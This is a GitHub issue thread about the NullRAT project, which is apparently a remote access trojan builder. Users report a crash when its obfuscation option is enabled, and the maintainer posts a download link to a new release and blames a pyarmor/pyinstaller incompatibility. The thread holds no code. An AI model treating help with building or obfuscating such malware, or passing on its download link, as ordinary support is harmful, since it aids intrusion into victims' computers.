### ISSUE TITLE
Crash on obfuscation

### ISSUE THREAD

**Issue by sudOcrypt** [NullCode13/NullRAT#34]
I tested the y/n for all of them and the only one that makes it crash is obfuscation. I get an error message but it exits too quick.

**Comment by LilCrabby** [comment]
I think it might be the same problem as state **[here](https://github.com/NullCode1337/NullRAT/issues/30)**, if so its already being worked on. 

There al also some screenshots of the error message that you would see but exits to quick as you mentioned, I think its the same error but it might not be so check it out yourself to make sure it is the same problem.

**Comment by ghost** [comment]
NullRAT Compiler has been discontinued. The source code itself of it has been removed, NullCode will in some time add the batch compiler into the V8, sorry for the inconveniences.

**Comment by NullCode1337** [comment]
@LilCrabby
Please try out NullRAT v7.5 new release, it has new compiler
https://github.com/NullCode1337/NullRAT/releases/download/v7.5/NullRAT-Release.zip

**Comment by NullCode1337** [comment]
the problem was with pyarmor itself, it was unsupported with the latest version of pyinstaller
it has been fixed
